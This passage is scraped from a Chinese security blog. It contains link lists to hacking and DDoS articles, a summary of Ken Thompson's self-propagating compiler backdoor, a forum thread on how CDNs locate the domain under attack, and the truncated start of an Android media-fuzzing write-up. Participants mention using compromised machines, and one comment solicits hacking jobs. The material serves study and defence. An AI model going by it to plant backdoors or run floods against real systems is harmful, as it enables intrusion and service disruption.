href="https://lcx.cc/post/2427/" target="_blank"视频：国外黑客无线入侵保时捷911，并且远程操控、遥控/a /p p style="text-indent:2em;" a href="https://lcx.cc/post/2426/" target="_blank"视频：国外黑客利用一部诺基亚N95手机入侵火车站电子屏，并且现场直播/a /p p style="text-indent:2em;" a href="https://lcx.cc/post/2425/" target="_blank"视频：国外黑客入侵高速公路交通电子屏/a /p p style="text-indent:2em;" a href="https://lcx.cc/post/2423/" target="_blank"大屏系统被黑泰国国会现场直播不雅照/a /p p style="text-indent:2em;" a href="https://lcx.cc/post/2408/" target="_blank"碰到一个冒充QQ好友进行诈骗的骗子……/a /p p style="text-indent:2em;" a href="https://lcx.cc/post/2405/" target="_blank"利用电磁波进行入侵、原子级的黑客入侵、利用电磁波毁坏物理设备/a /p p style="text-indent:2em;" a href="https://lcx.cc/post/2403/" target="_blank"QQ邮箱漏洞被骗子利用小企鹅一闪1000块被骗走/a /p p style="text-indent:2em;" a href="https://lcx.cc/post/2400/" target="_blank"电信诈骗，电话营销，一响挂电话，推销平安、人寿保险，冒充朋友/a /p p style="text-indent:2em;" a href="https://lcx.cc/post/2399/" target="_blank"广东台湾两地警方联手破获电信诈骗大案/a /p p style="text-indent:2em;" a href="https://lcx.cc/post/2397/" target="_blank"电视机会收到邻居游戏机画面？小霸王信号干扰？红白机功率这么强悍？/a /p p style="text-indent:2em;" a href="https://lcx.cc/post/2371/" target="_blank"任何一种装机量巨大的软件，都有政府监控模块，我们应该如何保护自己？/a /p p style="text-indent:2em;" a href="https://lcx.cc/post/2366/" target="_blank"我国将建立IP地址黑名单制度打击网络垃圾邮件/a /p p style="text-indent:2em;" a href="https://lcx.cc/post/2354/" target="_blank"小米官网“闹鬼” 消费者买手机三千元被骗/a /p p style="text-indent:2em;" a href="https://lcx.cc/post/2259/" target="_blank"末世入侵行动 (Fire Sale!) 末日入侵行动/a /p p style="text-indent:2em;" a href="https://lcx.cc/post/2258/" target="_blank"黑客曝联通“10010短信”漏洞被指易遭诈骗利用/a /p p style="text-indent:2em;" a href="https://lcx.cc/post/2250/" target="_blank"网络钓鱼危急行业发展专家呼吁各方合力围剿/a /p p style="text-indent:2em;" a href="https://lcx.cc/post/2114/" target="_blank"黑客考虑发射通讯卫星对抗全球互联网监管/a /p p style="text-indent:2em;" a href="https://lcx.cc/post/2074/" target="_blank"Tabnapping 浏览器标签劫持用假冒浏览器标签进行钓鱼攻击/a /p p style="text-indent:2em;" a href="https://lcx.cc/post/2064/" target="_blank"GSM蜂窝基站定位基本原理浅析/a /p p style="text-indent:2em;" a href="https://lcx.cc/post/2056/" target="_blank"用黑客方式找回失窃的电脑 - GSM基站定位 - Wifi热点定位/a /p p style="text-indent:2em;" a href="https://lcx.cc/post/2055/" target="_blank"不要偷黑客的东西 - Why you don't steal from a hacker/a /p p style="text-indent:2em;" a href="https://lcx.cc/post/1996/" target="_blank"惊爆！电影白蛇传说官网被挂“QQ中奖诈骗广告”！/a /p p style="text-indent:2em;" a href="https://lcx.cc/post/1814/" target="_blank"物理攻击、抓频攻击 - 利用雷达来进行扫描网络弱点/a /p p style="text-indent:2em;" a href="https://lcx.cc/post/1805/" target="_blank"解密电信诈骗：改号平台盗用110 日拨上万电话/a /p p style="text-indent:2em;" a href="https://lcx.cc/post/1801/" target="_blank"67名跨国电信诈骗嫌犯从菲律宾押解回到福州/a /p p style="text-indent:2em;" a href="https://lcx.cc/post/1781/" target="_blank"工程师网盗支付宝11万开设79个账户转移盗款/a /p p style="text-indent:2em;" a href="https://lcx.cc/post/1757/" target="_blank"【分析】腾讯独立域名QQ空间被钓鱼，腾讯官网被黑，被植入钓鱼页面！/a /p p style="text-indent:2em;" a href="https://lcx.cc/post/1755/" target="_blank"男子信用卡绑定电话遭修改被盗刷7万元/a /p p style="text-indent:2em;" a href="https://lcx.cc/post/1740/" target="_blank"北京警方破获新型网络合同诈骗案/a /p p style="text-indent:2em;" a href="https://lcx.cc/post/1715/" target="_blank"黑客盯上外贸公司业务员邮箱入侵员工电脑跨国诈骗案/a /p p style="text-indent:2em;" a href="https://lcx.cc/post/1555/" target="_blank"黑客的新目标:泄密其他黑客资料/a /p p style="text-indent:2em;" a href="https://lcx.cc/post/1346/" target="_blank"台两15岁少年开淫窟骗12名少女为“爱”卖身月进300万元/a /p p style="text-indent:2em;" a href="https://lcx.cc/post/1337/" target="_blank"【公告】警惕名为:Nuclear'Atk. QQ:424244818 冒充本人的骗子黑客/a /p p style="text-indent:2em;" a href="https://lcx.cc/post/1303/" target="_blank"苹果iPhone和谷歌Android手机被曝"定位"用户/a /p p style="text-indent:2em;" a href="https://lcx.cc/post/1213/" target="_blank"入侵者必读, 网警、公安是如何找到你的!/a /p p style="text-indent:2em;" a href="https://lcx.cc/post/1172/" target="_blank"【视频】宝坻 - 历史上最胆大的银行劫匪/a /p p style="text-indent:2em;" a href="https://lcx.cc/post/1120/" target="_blank"某人肉搜索的典型案例分析一群推理神牛/a /p p style="text-indent:2em;" a href="https://lcx.cc/post/1046/" target="_blank"无银行卡,密码10万元1分钟转走,超级黑客?/a /p p style="text-indent:2em;" a href="https://lcx.cc/post/733/" target="_blank"【公告】公布一个特大诈骗案件的网络“黑客”/a /p p style="text-indent:2em;" a href="https://lcx.cc/post/32/" target="_blank"DRDoS 反弹DDoS攻击反弹DDoS攻击力度远大于分布式DDOS攻击/a /p pstrong留言评论（旧系统）：/strong/p div style="max-height:600px;width:100%;overflow:auto;overflow-x:hidden;" blockquote id="8111,4579,121.22.253.232" p佚名 @ 2016-01-06 21:49:00/p p style="text-indent:2em"有接单的吗联系我1343119337/p p本站回复：/p p style="text-indent:2em"站长提示：网络广告有风险，注意辨别，谨防上当受骗！！！/p /blockquote blockquote id="8213,4579,221.136.15.180" p仁二 @ 2016-04-10 05:00:30/p p style="text-indent:2em"路过/p p本站回复：/p p style="text-indent:2em"+1/p /blockquote blockquote id="8225,4579,43.227.113.52" pand1=1 @ 2016-04-18 11:31:35/p p style="text-indent:2em"123/p p本站回复：/p p style="text-indent:2em"123/p /blockquote /div

比 XcodeGhost 更邪恶的手段 30 年前就出现了（反思对信任的信任）

Nuclear'Atk（核攻击）网络安全实验室

2015年10月26日 14:42

p style="text-indent:2em;" 比 XcodeGhost 更邪恶的手段 30 年前就出现了 /p p style="text-indent:2em;" 最近在开发者圈里讨论最多的莫过于 XcodeGhost。其实在 20 年前，更高明的手段就出现了。 /p p style="text-indent:2em;" 1984 年的时候，UNIX 创造者之一 Ken Thompson 获得了 ACM 图灵奖。他的获奖演讲叫做 strongspan style="color:#006600;"Reflections on Trusting Trust（反思对信任的信任）/span/strong。 /p p align="center" img title="1984 年图灵奖得主 Ken Thompson" alt="1984 年图灵奖得主 Ken Thompson" src="https://lcx.cc/file/old/4743_1.jpg" width="480" height="640" / /p p align="center" 1984 年图灵奖得主 Ken Thompson /p p style="text-indent:2em;" 在这个稿子只有三页纸的演讲中他分三步描述了如何构造一个非常难以被发现的编译器后门。这后来被称为 the Ken Thompson Hack（KTH），有人说它是 the root password of all evil。 /p p style="text-indent:2em;" 在第一步里，Thompson 展示了一个可以输出自己的源代码的 C 程序。这需要一定技巧，但很多人作为编程练习都做过。 /p p style="text-indent:2em;" 在第二步里，Thompson 在 C 的编译器里增加了一段代码（后门），让它在检测到自己在编译 UNIX 的 login 命令时在输出里插入一个后门。这个后门会允许作者用特定密码以 root 身份登录系统。 /p p style="text-indent:2em;" 在第三步里，Thompson 在第二步的编译器里使用第一步的方法加入另一段代码（后门生成器），使得这个编译器在检测到它在编译自己时自动把第二步的后门和第三步的后门生成器插入到输出里。 /p p style="text-indent:2em;" 在得到一个第三步的编译器后，就可以把第二、三步新增的代码从源代码里删除，因为这个新的编译器在编译它自己原来「干净」的源代码时会自动把后门和后门生成器加上。很多语言的编译器都会使用「自举」的方式编译，也就是会用一个编译器的旧版本可执行文件来编译新版本的源码，所以这样一个高危的后门完全可以在一个开源项目里存在。通过阅读这个编译器的源码是无法发现这个后门的。 /p p style="text-indent:2em;" KTH 还可以被加强，让它更难被察觉。比如这个编译器可以污染它编译的调试器、反编译器等开发过程中使用的工具，使得即使程序员反编译这个编译器后看到的仍是干净的代码，除非他使用的是 KTH 注入前的版本。所以当这个带有 KTH 注入的编译器来自于官方渠道时，它的后门是几乎不会被发现的，而且会影响所有用户。 /p p style="text-indent:2em;" 最近的 XcodeGhost 最多只能算是 the Ken Thompson Hack 的一个简化版本，没有试图隐藏自己，并且修改的不是编译器本身，而是 Xcode 附带的框架库。 /p p style="text-indent:2em;" Thompson 在演讲里的结论是：即使开源项目也无法保证安全。在不考虑硬件或 microcode 后门的情况下，只有当运行的每一个程序都完全是自己写的时才能确保安全。可是谁的电脑上能只运行自己写的程序呢？恐怕只有 Ken Thompson 和 Dennis Ritchie 能在用自己发明的语言写的操作系统上用自己写的编译器编译自己写的操作系统吧。 /p p style="text-indent:2em;" Ken Thompson 从贝尔实验室退休几年之后加入了 Google。在 Google，他和原来贝尔的老同事一起发明了 Go 语言。strongGo 从 1.5 版开始以自举的方式编译。;-)/strong /p p style="text-indent:2em;" 原文地址：a href="https://medium.com/@jiangh/%E6%AF%94-xcodeghost-%E6%9B%B4%E9%82%AA%E6%81%B6%E7%9A%84%E6%89%8B%E6%AE%B5-30-%E5%B9%B4%E5%89%8D%E5%B0%B1%E5%87%BA%E7%8E%B0%E4%BA%86-daf4d9cbadbb" target="_blank"via Hong Jiang@medium/a /p

讨论：一些CDN厂商(比如加速乐,360等)是怎么计算域名流量的(非HTTP)？

Nuclear'Atk（核攻击）网络安全实验室

2015年10月26日 14:27

p style="text-indent:2em;" 一些计算流量的CDN厂商(比如加速乐)是怎么计算域名流量的 /p p style="text-indent:2em;" huoji (有时候,想象力是突破技术瓶颈的关键！) | 2015-10-12 23:59 /p p style="text-indent:2em;" 不是http的流量 /p p style="text-indent:2em;" 是计算纯流量的 /p p style="text-indent:2em;" 比如骇客A 使用UDP碎片攻击了加速乐保护的网站，结果流量太大回源 /p p style="text-indent:2em;" 那么加速乐是怎么知道这个域名流量很大呢? /p p style="text-indent:2em;" a href="http://zone.wooyun.org/content/23357" target="_blank"[原文地址]/a /p p strong各种吐槽：/strong /p p style="text-indent:2em;" 1# /p p style="text-indent:2em;" 小熊饼干 | | 2015-10-13 23:17 /p p style="text-indent:2em;" 一般人我都不告诉他。 /p p style="text-indent:2em;" 最基本的原理是二分法，当你ip足够多时，检测出那个域名正在被攻击不是很难。 /p p style="text-indent:2em;" CDN 厂商一般有很多个节点，分布在全球/全国各地，如果是攻击源很分散（如肉鸡），则由于智能调度的存在，这些攻击流量会被分散到各个节点，导致攻击效果会差很多，所以这种不在这里讨论。这种其实cdn最喜欢了，像cloudflare也是使用anycast等将攻击流量分散到全球节点，这样防御能力就相当于将各个节点的带宽加起来。 /p p style="text-indent:2em;" 另外，有个基础，检测某个目的IP（CDN的ip）的流量大小是很简单的。 /p p style="text-indent:2em;" 先以国内的为例，国内的CDN就比较苦逼，anycast实施起来很贵，只能使用unicast，这样，智能调度只能在dns解析上做文章了。比如电信的用户调度到电信的节点，河南的调度到河南的节点。 /p p style="text-indent:2em;" 先来分析一个简单的攻击例子，比如你有一个20G的攻击带宽，syn/udp flood 某个域名时，可能你的攻击目标会集中到少数几个（如2个，记为ip1，ip2）。 /p p style="text-indent:2em;" 这样，我们来看下，如果我是cdn我会怎么做： /p p style="text-indent:2em;" 0. 上面说了，CDN检测到了自己的这两个ip流量异常是很easy的。 /p p style="text-indent:2em;" 1. 这两个ip上的域名是‘嫌疑人’，但是可能多达N个。 /p p style="text-indent:2em;" 2. 那我们就将这N个二分，分到2个新的ip上，ip3， ip4，这样ip3， ip4 各有N/2个域名。 /p p style="text-indent:2em;" 3. 如果攻击不会跟随dns解析，即攻击还傻傻打ip1，ip2，那我大不了放弃这两个ip，或者将其引入黑洞。（此时找不出谁被打） /p p style="text-indent:2em;" 4. 如果攻击跟随dns解析，那么好玩的来了，或者打ip3，或者打ip4（注意，我们先只考虑同一时间只有一个域名） /p p style="text-indent:2em;" 5. 假设打ip3，我们就继续二分，将N/2 个域名解析到ip5，ip6，这也ip5，ip6上只有N/4个域名。 /p p style="text-indent:2em;" 6. 以此下去，就可以找到是哪个倒霉鬼被打。 /p p style="text-indent:2em;" 7. 当逻辑梳理清楚，其实这些都是可以自动化的。 /p p style="text-indent:2em;" cloudflare 使用了anycast，如果定位到某个ip被攻击，很方便的可以将此ip的流量分散到全球节点，或者放到黑洞类的设备。 /p p style="text-indent:2em;" 上面只是简单的原理说明，大家可以自己想下更复杂的场景： /p p style="text-indent:2em;" 1. 多个域名同时被打怎么办。 /p p style="text-indent:2em;" 2. 攻击不跟随，把ip1，ip2 所在机房打卦怎么办。 /p p style="text-indent:2em;" 3. cdn 应该怎么把客户分配到不同的ip上去 /p p style="text-indent:2em;" 4. 国内没有anycast，即每个节点都是独立作战，这时候该怎么办。 /p p style="text-indent:2em;" 2# /p p style="text-indent:2em;" Mujj (为何我的眼中饱含泪水？因为我装逼装的深沉) | 2015-10-13 01:00 /p p style="text-indent:2em;" 这是一个难题，cloudflare、阿里云还有另外一些CDN商已经有方案出来了，但是都没公开过，或许谷歌专利上面能找到？ /p p style="text-indent:2em;" 3# /p p style="text-indent:2em;" huoji (有时候,想象力是突破技术瓶颈的关键！) | 2015-10-13 18:38 /p p style="text-indent:2em;" @Mujj 那有什么可能的方法呢 /p p style="text-indent:2em;" 4# /p p style="text-indent:2em;" 小哲哥 | 2015-10-14 07:34 /p p style="text-indent:2em;" 楼上说的涨姿势了，虽然我不懂 /p p style="text-indent:2em;" 5# /p p style="text-indent:2em;" 我是小号6 (1:8.5长期收购wb，QQ1136036036) | 2015-10-14 08:19 /p p style="text-indent:2em;" 楼上的楼上说的涨姿势了，虽然我不懂 /p p style="text-indent:2em;" 6# /p p style="text-indent:2em;" huoji (有时候,想象力是突破技术瓶颈的关键！) | 2015-10-14 10:41 /p p style="text-indent:2em;" @小熊饼干我是说这么计算被攻击的流量 /p p style="text-indent:2em;" 7# /p p style="text-indent:2em;" huoji (有时候,想象力是突破技术瓶颈的关键！) | 2015-10-14 10:42 /p p style="text-indent:2em;" @小熊饼干怎么计算CDN节点上一个域名的流量呢 /p p style="text-indent:2em;" 8# /p p style="text-indent:2em;" 小熊饼干 | 2015-10-14 10:57 /p p style="text-indent:2em;" 找到了哪个域名被攻击，然后将其防到单个IP上，然后看下这个ip的流量多大，是不是就计算出来了？ /p p style="text-indent:2em;" BTW：你在加速乐面板上看到的流量大小根本不是syn／udp 流量的的大小。 /p p style="text-indent:2em;" 如果是CC攻击，计算流量大小很简单是吧？ /p p style="text-indent:2em;" 9# /p p style="text-indent:2em;" %230CC (Who's Your Daddy ---lordi) | 2015-10-14 11:25 /p p style="text-indent:2em;" 其次应该是CDN有标识吧。 /p p style="text-indent:2em;" 你从哪来要到哪去 /p p style="text-indent:2em;" 都会有标识和记录 /p p style="text-indent:2em;" 所有你流量打站的时候 /p p style="text-indent:2em;" 可能我不知道你从哪里来 /p p style="text-indent:2em;" 但是我知道你是要到哪里去 …… /p p style="text-indent:2em;" 哎呦我去 /p p style="text-indent:2em;" 10# /p p style="text-indent:2em;" GaRY | 2015-10-14 12:44 /p p style="text-indent:2em;" 基本是 @小熊饼干所说的那些方法。这是针对目前那种非应用层攻击的协议层攻击类型最普遍的查找方式。 /p p style="text-indent:2em;" 这里补充一下，在很多云CDN厂商，很多情况下他也同时是被攻击网站的DNS服务者。在被攻击的时候，利用同时针对DNS的分析也能找到一些蛛丝马迹。如果不通过DNS解析的，说明并不是针对某一站点，通常就当作是针对节点进行攻击进行防御就OK了，这些攻击不会计入到单个站点的流量中。 /p p style="text-indent:2em;" 至于协议层攻击，对于国外厂商，anycast的作用下，让他们其实不care究竟是哪个域名带来的。如何防御才是第一位的。在这个时候，屏蔽攻击来源更容易实现。 /p p style="text-indent:2em;" 而对于国内厂商，没有anycast让他们没法发挥最大防御能力，因此才会经常用到二分法之类的方式，定位攻击站点，在实在无法防御的大型攻击情况下，才会剔除他来保其他。 /p p style="text-indent:2em;" 顺带说下，绝大多数云CDN厂商在控制面板里显示的攻击流量，都单纯的是应用层攻击流量（CC+web攻击）。 /p p style="text-indent:2em;" 11# /p p style="text-indent:2em;" 小熊饼干 | 2015-10-14 13:00 /p p style="text-indent:2em;" @GaRY 多谢大牛补充。 /p p style="text-indent:2em;" 12# /p p style="text-indent:2em;" huoji (有时候,想象力是突破技术瓶颈的关键！) | 2015-10-14 13:14 /p p style="text-indent:2em;" @小熊饼干还有一个问题，某些免费cdn，比如360网站卫士。 /p p style="text-indent:2em;" 当有udp攻击的时候，我服务器上的金盾会发现是360的节点发动了udp攻击，，看情况很像是360把“流量”转发到了我服务器上。。。这又是咋回事。 /p p style="text-indent:2em;" 13# /p p style="text-indent:2em;" 小熊饼干 | 2015-10-14 13:41 /p p style="text-indent:2em;" @huoji UDP “转发”这个问题就要具体分析了。按说360也算一个‘正规’厂商，应该不会转发UDP的。怀疑是他们DNS服务器被利用放大攻击了？ /p p style="text-indent:2em;" 只是猜测，需要你抓包分析下。 /p p style="text-indent:2em;" 14# /p p style="text-indent:2em;" Mujj (为何我的眼中饱含泪水？因为我装逼装的深沉) | 2015-10-14 13:56 /p p style="text-indent:2em;" 国内这些厂商里面数电信的云堤有优势，来自电信的攻击基本上算全过滤了，近源压制、近源清洗，基本上来自电信的攻击源流量还没出省攻击源和流量就被处理了，X里云的X盾里面有他的影子。 /p p style="text-indent:2em;" 15# /p p style="text-indent:2em;" huoji (有时候,想象力是突破技术瓶颈的关键！) | 2015-10-14 18:43 /p p style="text-indent:2em;" @Mujj 晚点拿几个肉鸡试一下给你看看吧，我当时就很奇怪。 /p p style="text-indent:2em;" 16# /p p style="text-indent:2em;" huoji (有时候,想象力是突破技术瓶颈的关键！) | 2015-10-14 20:16 /p p style="text-indent:2em;" @Mujj 你可以无视我的回复。 /p p style="text-indent:2em;" 17# /p p style="text-indent:2em;" huoji (有时候,想象力是突破技术瓶颈的关键！) | 2015-10-14 20:16 /p p style="text-indent:2em;" @小熊饼干晚点我要试一下。。 /p p style="text-indent:2em;" 18# /p p style="text-indent:2em;" 无敌L.t.H (‮……天百一爱恋考高：簿相色白产国) | 2015-10-18 23:06 /p p style="text-indent:2em;" 分配的CNAME解析次数多、分布广也会被发现。 /p p style="text-indent:2em;" 19# /p p style="text-indent:2em;" 无敌L.t.H (‮……天百一爱恋考高：簿相色白产国) | 2015-10-18 23:12 /p p style="text-indent:2em;" 大多数CDN是禁止非HTTP流量通过的，一般UDP流量在上级网络中就被过滤掉了，所以很多“高防”服务器是禁止UDP流量通过的。 /p p style="text-indent:2em;" 20# /p p style="text-indent:2em;" Mujj (为何我的眼中饱含泪水？因为我装逼装的深沉) | 2015-10-19 02:22 /p p style="text-indent:2em;" @无敌L.t.H 哪来的撸哪 /p p strong相关内容：/strong /p p style="text-indent:2em;" a href="https://lcx.cc/post/4479/" target="_blank"简单获取CDN背后网站的真实IP，CDN逆向，反向跟踪网站真实IP/a /p p style="text-indent:2em;" a href="https://lcx.cc/post/4424/" target="_blank"cdn缓存的一些安全风险，cdn加速网络节点缓存可能导致的严重安全问题/a /p p style="text-indent:2em;" a href="https://lcx.cc/post/4324/" target="_blank"对“国内大多缓存DNS已可能被秘密劫持”漏洞的再次猜想/a /p p style="text-indent:2em;" a href="https://lcx.cc/post/4041/" target="_blank"通过nginx配置文件抵御攻击，防御CC攻击的经典思路！/a /p p style="text-indent:2em;" a href="https://lcx.cc/post/3954/" target="_blank"CDN流量放大攻击思路/a /p p style="text-indent:2em;" a href="https://lcx.cc/post/3949/" target="_blank"站争（代号1937）第三节：决策！（上）/a /p p style="text-indent:2em;" a href="https://lcx.cc/post/3892/" target="_blank"Zmap详细用户手册和DDOS的可行性/a /p p style="text-indent:2em;" a href="https://lcx.cc/post/3832/" target="_blank"打造TB级流量DDoS大杀器，超级流量反射放大攻击系统/a /p p style="text-indent:2em;" a href="https://lcx.cc/post/3818/" target="_blank"如何看两个ip是不是在一个机房，路由追踪/a /p p style="text-indent:2em;" a href="https://lcx.cc/post/3803/" target="_blank"【逆向爆菊】某DDOS事件逆向追踪。。。有人深挖过吗？/a /p p style="text-indent:2em;" a href="https://lcx.cc/post/3661/" target="_blank"云计算做数据包分析防御DDOS攻击/a /p p style="text-indent:2em;" a href="https://lcx.cc/post/3657/" target="_blank"超级短信DDOS 女生一天收上万条10086短信还有近50万条等着她/a /p p style="text-indent:2em;" a href="https://lcx.cc/post/3614/" target="_blank"黑客可利用云开发平台进行DDOS攻击/a /p p style="text-indent:2em;" a href="https://lcx.cc/post/3605/" target="_blank"基于云计算的DDOS攻击缓解方案/a /p p style="text-indent:2em;" a href="https://lcx.cc/post/3526/" target="_blank"迅雷云你伤不起啊，利用迅雷云资源绑架用户，发起大型DDOS攻击/a /p p style="text-indent:2em;" a href="https://lcx.cc/post/3476/" target="_blank"史上最大流量DDOS攻击者被捕/a /p p style="text-indent:2em;" a href="https://lcx.cc/post/3459/" target="_blank"分析：DDos攻击被更有针对性地应用/a /p p style="text-indent:2em;" a href="https://lcx.cc/post/3447/" target="_blank"IP反查网站接口旁站查询 IP查域名域名历史解析记录查询 IP地址查机房AS号/a /p p style="text-indent:2em;" a href="https://lcx.cc/post/3414/" target="_blank"一段黄色笑话引发的DDoS攻击/a /p p style="text-indent:2em;" a href="https://lcx.cc/post/3410/" target="_blank"US-CERT：DNS服务器配置不当是上周300G DDoS的元凶/a /p p style="text-indent:2em;" a href="https://lcx.cc/post/3323/" target="_blank"由多个独立站长共享服务器资源组建巨型类CDN云网络的可行性/a /p p style="text-indent:2em;" a href="https://lcx.cc/post/3207/" target="_blank"基地组织官网遭受海量ddos攻击/a /p p style="text-indent:2em;" a href="https://lcx.cc/post/3186/" target="_blank"基于日志整理出的经常扫描的 IDC、ISP、IP段、AS号及web服务器内容/a /p p style="text-indent:2em;" a href="https://lcx.cc/post/3056/" target="_blank"DDoS 攻击转移到 IPv6/a /p p style="text-indent:2em;" a href="https://lcx.cc/post/3016/" target="_blank"Asp + 后台服务控制的 DDOS 木马，整套源码下载/a /p p style="text-indent:2em;" a href="https://lcx.cc/post/2737/" target="_blank"WordPress 怎么防止刷流量？一个讨论防御CC攻击的话题……/a /p p style="text-indent:2em;" a href="https://lcx.cc/post/2736/" target="_blank"绕过CDN的思路，绕过CDN查找真实IP的思路，一个新颖并另类的方法/a /p p style="text-indent:2em;" a href="https://lcx.cc/post/2736/" target="_blank"绕过CDN查找真实IP的思路，一个新颖并另类的方法/a /p p style="text-indent:2em;" a href="https://lcx.cc/post/2628/" target="_blank"IIS 6.0 IP 地址限制辅助工具 v1.0/a /p p style="text-indent:2em;" a href="https://lcx.cc/post/2574/" target="_blank"IIS 批量封禁 IP 地址、网站被 CC 攻击的解决办法/a /p p style="text-indent:2em;" a href="https://lcx.cc/post/2566/" target="_blank"简单分析一次 CC 攻击/a /p p style="text-indent:2em;" a href="https://lcx.cc/post/2345/" target="_blank"浅谈Ddos攻击攻击与防御/a /p p style="text-indent:2em;" a href="https://lcx.cc/post/2330/" target="_blank"长安刺客 - 旁注杀手 v1.3 + Crazy Scan v1.0 - 疯狂扫描 v1.0，发布！/a /p p style="text-indent:2em;" a href="https://lcx.cc/post/2094/" target="_blank"Asp 防御CC攻击模块 (Anti-CC.asp)/a /p p style="text-indent:2em;" a href="https://lcx.cc/post/2092/" target="_blank"Asp 防御CC攻击模块 (Anti-CC.asp) - 增加小功能/a /p p style="text-indent:2em;" a href="https://lcx.cc/post/2010/" target="_blank"【CSRF】基于图片方式(lt;img)的 DDOS、CC、会话劫持以及刺探用户信息/a /p p style="text-indent:2em;" a href="https://lcx.cc/post/1959/" target="_blank"查找“CDN、负载均衡、反向代理”等大型网络真实IP地址的方法/a /p p style="text-indent:2em;" a href="https://lcx.cc/post/1910/" target="_blank"电磁风暴超暴力 PHP DDOS 攻击工具 amp; PHP DDOS 攻击 - 编年史/a /p p style="text-indent:2em;" a href="https://lcx.cc/post/1904/" target="_blank"长安刺客 - 旁注杀手 v1.2 版 + CDN 终结者 v1.1 发布/a /p p style="text-indent:2em;" a href="https://lcx.cc/post/1871/" target="_blank"长安刺客 - 旁注杀手 v1.1 版发布，外加强力新功能：CDN 终结者 v1.0/a /p p style="text-indent:2em;" a href="https://lcx.cc/post/1725/" target="_blank"美国热炒解放军网络战能力国产神器！军工级暴力DDOS攻击系统！/a /p p style="text-indent:2em;" a href="https://lcx.cc/post/1720/" target="_blank"长安刺客 - 旁注杀手 v1.0 Beta4/a /p p style="text-indent:2em;" a href="https://lcx.cc/post/1713/" target="_blank"长安刺客 - 旁注杀手 v1.0 Beta3/a /p p style="text-indent:2em;" a href="https://lcx.cc/post/1703/" target="_blank"长安刺客 - 旁注杀手 v1.0 Beta1/a /p p style="text-indent:2em;" a href="https://lcx.cc/post/1703/" target="_blank"长安刺客 - 旁注杀手 v1.0 Beta 测试版 - 发布/a /p p style="text-indent:2em;" a href="https://lcx.cc/post/1360/" target="_blank"男子转嫁黑客攻击致金盾网瘫痪被DDOS请勿乱指域名到政府网/a /p p style="text-indent:2em;" a href="https://lcx.cc/post/1151/" target="_blank"疯子的研究: 瘫痪整个互联网绝非天方夜谭/a /p p style="text-indent:2em;" a href="https://lcx.cc/post/1147/" target="_blank"利用P2P网络发动大规模、大流量DDOS攻击/a /p p style="text-indent:2em;" a href="https://lcx.cc/post/907/" target="_blank"Linux 系统下 DDOS 工具 tfn2k 攻击原理详解/a /p p style="text-indent:2em;" a href="https://lcx.cc/post/806/" target="_blank"【批处理】批处理、Bat 也能进行 DDOS 攻击？/a /p p style="text-indent:2em;" a href="https://lcx.cc/post/161/" target="_blank"【Asp代码】用Asp来搞DDOS攻击/a /p p style="text-indent:2em;" a href="https://lcx.cc/post/129/" target="_blank"【Asp技巧】用Asp来DDOS/a /p p style="text-indent:2em;" a href="https://lcx.cc/post/32/" target="_blank"DRDoS 反弹DDoS攻击反弹DDoS攻击力度远大于分布式DDOS攻击/a /p pstrong留言评论（旧系统）：/strong/p div style="max-height:600px;width:100%;overflow:auto;overflow-x:hidden;" blockquote id="7979,4574,49.4.165.61" p佚名 @ 2015-11-02 09:17:11/p p style="text-indent:2em"“huoji (有时候,想象力是突破技术瓶颈的关键！) | 2015-10-14 13:14 @小熊饼干还有一个问题，某些免费cdn，比如360网站卫士。当有udp攻击的时候，我服务器上的金盾会发现是360的节点发动了udp攻击，，看情况很像是360把“流量”转发到了我服务器上。。。这又是咋回事。quot; 我相信这个人绝对是“白”帽子 : )/p p本站回复：/p p style="text-indent:2em"-_-!!!/p /blockquote /div

MFFA：Android多媒体文件漏洞Fuzzing框架分析与测试

Nuclear'Atk（核攻击）网络安全实验室

2015年8月13日 14:07

p style="text-indent:2em;" a href="https://lcx.cc/file/old/4724_1.jpg" target="_blank"img title="MFFA：Android多媒体文件漏洞Fuzzing框架分析与测试" alt="MFFA：Android多媒体文件漏洞Fuzzing框架分析与测试" src="https://lcx.cc/file/old/4724_1.jpg" width="780" height="595" //a /p p style="text-align:center;" 本文首发www.droidsec.cn | 安卓安全中文站转载请注明出处 /p p style="text-indent:2em;" strong0x01.MFFA简介/strong /p p style="text-indent:2em;" MFFA（项目地址：https://github.com/fuzzing/MFFAnbsp;作者Alexandrunbsp;Blanda来自Intel）是一个基于Python开发的通过对Android平台多媒体文件解码功能进行模糊测试从而发现可能的安全漏洞的安全测试框架，主要原理是通过指定一些畸型但在结构上是有效的媒体文件发送到Android设备中的组件进行解码或者是播放，与此同时监测系统发生的一些可能导致可利用漏洞的潜在问题(如Crash)，最后对fuzzing结果进行自动整理过滤掉大部分重复问题和误报，研究者可以通过手工分析来确定最终的结果。nbsp;通过对此框架的分析，我们可以复现最近热门的Androidnbsp;Stagefright组件漏洞的挖掘方法，甚至可以对框架进行二次开发，用于Android系统0day挖掘，移动App客户端产品安全测试。 /p p style="text-indent:2em;" strong0x02.使用方法/strong /p p style="text-indent:2em;" strong（1）环境要求/strong /p p style="text-indent:2em;" 支持Linux环境（修改后支持Mac/Win平台），Pythonnbsp;2.7及以上版本本，Androidnbsp;SDK工具包。同时需修改Android源码并重新编绎以启用Stagefright命令行界面工具。（可使用Genymotion中的Android4.1.1版模拟器代替） /p p style="text-indent:2em;" strong（2）开始测试/strong /p p style="text-indent:2em;" pythonnbsp;test.pynbsp;stagefrightnbsp;lt;video|audiogt;lt;play|noplaygt;lt;indexgt; /p p style="text-indent:2em;" lt;video|audiogt;选择测试的文件是视频/音频类文件 /p p style="text-indent:2em;" lt;play|noplaygt;在音频测试中，选择是否启用播放功能以检测某可能的漏洞 /p p style="text-indent:2em;" lt;indexgt;如果中途中止测试，指定断点处重新启动测试 /p p style="text-indent:2em;" strong（3）结果分类/strong /p p style="text-indent:2em;" pythonnbsp;triage.pynbsp;lt;SIGSEGV|SIGILL|SIGFPE|allgt;lt;video|audiogt; /p p style="text-indent:2em;" lt;SIGSEGV|SIGILL|SIGFPE|allgt;过滤的信号种类 /p p style="text-indent:2em;" lt;video|audiogt;测试的文件种类 /p p style="text-indent:2em;" strong0x03.原理分析/strong /p p style="text-indent:2em;" strong（1）目标/strong /p p style="text-indent:2em;" 发掘那些能引起Crash，进程挂起，拒绝服务，缓存溢出，空指针引用错误，整数溢出的安全漏洞 /p p style="text-indent:2em;" strong（2）流程图/strong /p p style="text-indent:2em;" img title="MFFA：Android多媒体文件漏洞Fuzzing框架分析与测试" alt="MFFA：Android多媒体文件漏洞Fuzzing框架分析与测试" src="https://lcx.cc/file/old/4725_2.jpg" width="632" height="556" / /p p style="text-indent:2em;" strong（3）测试数据生成/strong /p ul li 